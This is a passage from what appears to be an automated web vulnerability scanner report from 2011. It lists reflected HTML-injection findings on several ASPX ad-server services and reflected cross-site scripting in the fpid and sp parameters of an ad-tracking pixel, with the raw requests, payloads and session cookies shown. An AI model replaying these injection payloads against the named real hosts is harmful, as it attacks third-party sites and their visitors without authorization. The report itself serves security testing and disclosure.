HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 04:45:05 GMT Content-Length: 5522 Connection: close
1.91. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/AdServerService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 32406<a>52ff5e45529 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&32406<a>52ff5e45529=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 04:45:15 GMT Content-Length: 1913 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 5468e<a>fbf31252ddf was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337995468e<a>fbf31252ddf HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 04:45:13 GMT Content-Length: 1907 Connection: close
1.93. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e81a6<a>eb6d1a11e41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&e81a6<a>eb6d1a11e41=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Proxy-Connection: keep-alive Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:54:36 GMT Connection: close Content-Length: 20181
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 847a5<a>b32f67f54e9 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799847a5<a>b32f67f54e9 HTTP/1.1 Host: publish.flashapi.vx.roo.com Proxy-Connection: keep-alive Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:54:35 GMT Connection: close Content-Length: 20169
1.95. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ClipInfoService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d1973<a>f81fb9edf10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&d1973<a>f81fb9edf10=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 04:45:18 GMT Content-Length: 22408 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload d659f<a>818d4ea9fd6 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799d659f<a>818d4ea9fd6 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 04:45:15 GMT Content-Length: 22396 Connection: close
1.97. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ErrorInfoService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e5957<a>b4dfccdf814 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&e5957<a>b4dfccdf814=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 04:45:23 GMT Content-Length: 5637 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 7211b<a>d13bd9d5899 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337997211b<a>d13bd9d5899 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 04:45:21 GMT Content-Length: 5625 Connection: close
1.99. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c107a<a>e030cdb19c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&c107a<a>e030cdb19c8=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Proxy-Connection: keep-alive Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:54:36 GMT Connection: close Content-Length: 27398
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 805d1<a>9442a9480e1 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799805d1<a>9442a9480e1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Proxy-Connection: keep-alive Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:54:34 GMT Connection: close Content-Length: 27386
1.101. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RSSService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6158d<a>fef6ea25a2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&6158d<a>fef6ea25a2d=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 04:45:23 GMT Content-Length: 8814 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload ddf95<a>fbeebb8e4ab was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799ddf95<a>fbeebb8e4ab HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 04:45:20 GMT Content-Length: 8802 Connection: close
1.103. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RatingService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 41784<a>c99c3d4327e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&41784<a>c99c3d4327e=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 04:45:17 GMT Content-Length: 5534 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 95d07<a>a64db502d4d was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-23379995d07<a>a64db502d4d HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 04:45:16 GMT Content-Length: 5522 Connection: close
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6594"><script>alert(1)</script>787c1397da1 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=a6594"><script>alert(1)</script>787c1397da1&sp=y&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/below-fold?t=1297130902623&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adImpCount=FM4QLcaMabkQsarcOBMTT_qd1v3GGeBcoJK0MOl0KG-Y481wEkFtGX7HudJA1SwJY9n9GIWJHDTqbWbTuEexfNzeQdD3uMEbsSJGoH6nZcvCzn_rbeUw4N91a2HFDwx7Wl6PMIbl8VoYkne2SJkXTcTcqhcYEXFRrx1COjt-xQdPBFgEFn33aBMbAqV_0XEIioGKZSAftgkVYZTzRayYVmmTJdkIn7237siDdt9MzJqJi5T6FYiHf9o35IlREqTNFveKpsZQ30qpNKi15RJt04BNhaXhDlSq6EvznmypgJEkna5GLuKLpEu7eZEeTMi7F6sK_rp2soXzwueUGRFartfze4TUjaNUIXjW8HpTdIXW8uxzXCZHw_1hR9tJint6dsPDEFhRxd_Mub3GEI1LN-tHiIt90vCIZrFIVkRcrTHWSuqW6r5ZIwUtscKD_QT9RhXOUlzX0--TPsid5EqGlKaR8fzj-CgEMyGy4iMXI1WxKbXh9CKgY6S3LP_zmj75AgqPmyW7n-K57XLwzviwi0UeS0QSNHqXIchkIsQCETGT3yD6yFHAIahzcKETB33UwCPq2GhFCxYySztyqVkKk9fqbN4-YU4FEz0wwkD5vsFOGK_87tDq8e92tNo34emrEgGEUj-NO1cCBiKRN0KNH1ftcOyrV1OLoU5x9aMp-92fSDdx8Pm4E6I95eyuD_EIQOJmu9RYL7YOIJ6DsZdIlrLgwokXGxtO8_jRpe316oYDuH7CMSEB_S7o6Xm3tvDBfH77IJVG0N6dycTdcjtOKF0Cz2TbSViJ-oT4nVLBUOQ7zE-OOnjPRQ6BZXJCY0oCMrkBfNspHfysXvb7GqOmGNAITbT7Z6AmMx12CVhoBV8PCKPJoslzeIPsOadDQ5GApTHEeUcb_20FLCe61hOZos4ND7pDMbh_Nz4asivfvnRRu_fmnuOn7vvqoBU15Zmhn2aVSJry2cIXXaBci8YswRWnz3-1lFmH8NpHbFKrPy3hBObtf8ALhKpons6mVN9Ng_E4yJzpnqztVh_CB-KMHlM4At-mEES-WC-9xjj3t3cnzJw50Wq6BglWv58k-98YkSbTm3kPOUdWBiWoLi0oN0AgeHAdeFjGHSfjDkMzE5p5e_oJDB2Um-liToPNlmN15FjrbRSBV8G9GwEgDofeTOxem0_gMApf3YWMEr3kQAQnXe4HjQMTBDROpzYRLGofXKwaWNtdj1-GtHzOUqyENh2k1W2pFwJOjkpENaGP0tqhG0BtDC_eTH_Ts10GvA6WhyC22lBHkEPeNKFx7RiTWcHRNLuEX2-svGHkdhG53xdJo9qHwXLy45nY7LSpUbn803gUXikBp5CFzTHxBLV0jIUUb9PGuTCtW-hvx86uIjCl7RrDpkAZSszkN92RjKcOSHyDTphfUd0ZqQTAbIYvZtNr_wQwmIEY35OpKNWhyGwNPlAh_ANj4laYRoTBJxnGQ7wgWZt0CSpxlrfASU5W2a6su59vlF-h6V4zet13tlPhRMEiyYm825vPff2nJDmVgFpIKs_vIo7sFsppJ43d8oTEgInxyFT6vScD8wD9aZjmMC0w6HS0HlWcNr1j-PhGS2ikng608Ubz0iz0TtbwhgQZq5IdyfSisA1KqAwL3sZErWVr76O0bqQTEPkhkBBP4vNeu_uKiDKKl73FedJ05pAh6qV14YUcXNrVmSSI1FzEzQ65n9aZSqRKUiLFvw0_FzJQi642bOf20jjwau1yNWbWc_OZc_OPEEY_dnkrDVdmeoMCTOxN_xl7C-3y_RTPHX8tA53fNzl8qfH897V8IhWPCe1DLrZ9lRQtTCZwINCJg6hyABA61hUJaqPVyX7fV7Pa1PW0-yYXb_USKuin2pZCaBr_uY_2UBH6Bm4UktJmd6sVQvXXEqhe9E5LsneRLFWbUdQszzXxD5egB584f5Iq0VaWXCofBTTX6PHG8K6lFCCN0TTnR1jCog1stnuLrLH_TLw0g_9l8j595C25K_O7nXuUqzkznnHJS2oIivO1MtzkhTD8tggahFLAwdtimGiAzgIbfwh3tPXiXBZiPEc6jmaSPplk32IRb7Tl08IFN1OghxmtWT_y47n5TtZS9Ky93uZuiaOzgh6RPqobZokxjCycBjwJJ-OqeZ3YCRoZ5XICuXWVHfipzGbbMT7XgVwScM8a1QBrHN9hJ559oPfWNXLGQYJF8WI3xWHXIXB86oJHZOjQy7IdFPhSTsF2yrOAh9s72IpPTbIy0ryOZR5kHQoGKZaDQPufKDCKOsAs5UyVIQTo0ztnk49jL0nNFaq4usSu0TQiqXjP7CIAd_5FtzMDApKZjTZ9VwWqS_hi3W5FLLAcz8HdwETYSzM0iqfAGlpVHegt_TIDru8ZVGlo2JchDi2BE0kETeswJqfjIM8eqB1CZXkSQ7Z_VjVnYvzBVNyB9AksqD2lQZb2X0IEqN843HNpf9LL79Gl1KBsoCUhcPx0GvFd6LDM_NesCTjn8qfPanRhqfFt_Mz5uEh2A3HFoGkf8ppxZxL6925r_GgrDoF5KcCR0z_dNX3kzjeRcgqW8BhR69hQhpeZrZnEJ52ohaD3WrTkTUj4YJ6Td6PLaDgaJxtMnnZrfAlG0SSD0cpxrho96Q5aYPi9en1l66z-sdlCvM2HwHHvukFOG1d5EaBIpvNzbIjvRqOmzYDhYzHqcbaWBj06fa97gFmB5jdUYj5pSK3CD2Yuk0PK5FYetxUklFsdind5sgdq4uZcD2KLx9Zf7jaxnwz6suaPAnsGTiQgiUvKmhf1LhrytQYKxDy-h4T29iDJXVr_vHZNnZTSMo3FOqO76V7e32Mz948gl-62XtaGUS8uw5NCpnBNXGUaigKHIg84ueIc4t5Yp3YWsvWh2i358DyJOyzgpnBHfTKfL-U_Busa7oEsjSep6DjzyTifPlN_P4smDk3kLq_iHqbXQ5svnKXdR0fKJFj2seLH8BbDFMsPiVsBIQ44v1dSgCalvY0FxkkJ5w0OZeWQP34jwLIAF168EspxmNyBZAxjbmEt8kjG7dRMykkE2LHXhz6x23r28D5B1-HnnnOalxwc8pVPIG67O2v9MtuGBypG0oO1sVM2Vbs7HFOP9G8F0R3RxUgEDCioFUEKPhCNOF99OExqDKIS0y-D3H8kAPjeIydjzyH2Ws7PKyE1dGY4WEg1BMpUBtxwX2H-7BKKuqPq2iSXQ7keQevoGn3niEhwrkx3I523rYfTIHt_4ntge3wT6HrPHWBJpD6Hr91CxZq9sV9Jmp33y8raIDjGaQc_8c0sEToR_ODvxgcgJ32KFhukOoA2cRquiPMf-CiwpIi4ayv6yWP-tXJ__VAnBFQL8j9ZaHEtyQCLoYLPIaWZ3CmWGBp_xNH3WlqbXOyrf_ATBbMNQCTCxOAxrjPhFf5rtBKDWKm24urmdIW_ZXAbYCZmLsz6YiVpaNRjSC9cVWjph0vEeVDn94cCqpnjE0z1BuYxXU6aN8KvfgQRgY4ZaCnGHk-ja9faWwfL-_-bPH3YFMHRKzulr4fOZJphXH_Th5iLN0VczjS8Jh9TEFyiFtC1iUdTIWwbUQ3HeHZgtn1yA0PmWEs3TAjOPMDh8jx0WcV7eT-TG33S7CRXLm9kG5yXyNmxCrzJ; fc=8Kodsw1QIRNJBnpSjhgJ0uErbJkTJYsNaCBFpaSI5yP-4Y1aL5T0hqj7dZyIiRNIWMZgDtcnKM_xOWbKnaMIO3_WyzVPxgN3VkTg_cPuFqziwJJKZupkpjfaBrjFc6z7RfOX1MD02-o6SZ1b0c_HcUiZ1Q4B83ZCB0ZNq2R2Ygc; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=15012%7C15011%7C15011%7C15013%7Cundefined%7C15011%7C15011%7C15011%7C15011%7C15011%7C15013%7C15013%7C14983%7C15013%7C15003; rv=1; pf=gVcpu03qRQgTB5NuU1EqIYqEr4b4Fq-og3GojR5p24eyrpLutjrg3FTJXr1E8PV6vkLTiGPWsGKJ1Wrqhl-HhQ7j1HFoP4OsobTnoYCCxvnKntOZfYFXgkvEXaL1UobLYMC1xk5bi3WvwsH-xYl33kP849CF7hcjVhWHTHUUYTis0H9ih5-5vFSOsVYuhQt6Iv4QeHxZTxJkHtgeP2GkzQt7XxlMyKRnDT2fVADwdo44PGNU_vJbXyHKcL6jneNP4-z_78WwfuPYpNg79jqGRprSVFacyOS-5Ebs506rt3Aem2wjSmTSakSnCA2AgYS6r3vWJ5sNwMJc7eO_e5WNawlDHzxcnnyKiFnoDhsGNc4pAxb4A7I47CNUJ6AbwwHHAatLSIvwiSzIGMiHluajY8fLBNpf3ENHcSGhLyQY8Gw-qep7oDaftEDZ2hKV8ANOevweg3MZu04fOjiPLG71HIPlyME1Zf31UWf3v_Xcs7g; uid=3011330574290390485
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 07-Aug-2011 02:09:00 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:08:59 GMT Content-Length: 377
The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2604a"><script>alert(1)</script>f2f82733516 was submitted in the sp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=4&sp=2604a"><script>alert(1)</script>f2f82733516&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/below-fold?t=1297130902623&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 